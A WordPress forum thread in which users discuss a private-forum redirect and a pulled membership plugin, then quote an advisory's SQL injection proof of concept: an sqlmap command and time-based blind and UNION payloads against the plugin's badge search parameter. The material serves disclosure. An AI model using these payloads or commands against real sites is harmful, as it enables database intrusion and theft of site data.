I’ve implemented your solution and it works pretty good so far. Thanks again.
When I go to the URL of a private Forum (while not logged in) it just throws a 404. Can I somehow redirect the User to a Login page?
Thank you very much! I will implement and test it over the next few days, but your solution sounds just perfect!
You saved me! Thanks. 🙂
The Plugin was (luckily) not installed. We just decided to use it, then we saw that wordpress has taken it down on their Plugin Site.
The exploit seems to be an SQL Injection.
# 1. Description
The GET parameters “search” and “sidx” does not sanitize user input when searching for badges.
# 2. Proof of Concept (PoC)
Use ZAP/Burp to capture the web request when searching for data and save it to request.txt
Referer: http://192.168.0.63/wp-admin/admin.php?page=supsystic-membership&module=badges&action=index
sqlmap -r request.txt –dbms=mysql -p search
Parameter: search (GET)
Type: time-based blind
Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s’ AND (SELECT 8958 FROM (SELECT(SLEEP(5)))oBIL) AND ‘trjK’=’trjK&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc
Type: UNION query
Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s’ UNION ALL SELECT NULL,CONCAT(0x71786a6b71,0x6569796370704c625352574e6e424874456a74457847635473525a466d47576f775a46446b4e7055,0x716a7a6a71),NULL,NULL– -&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc
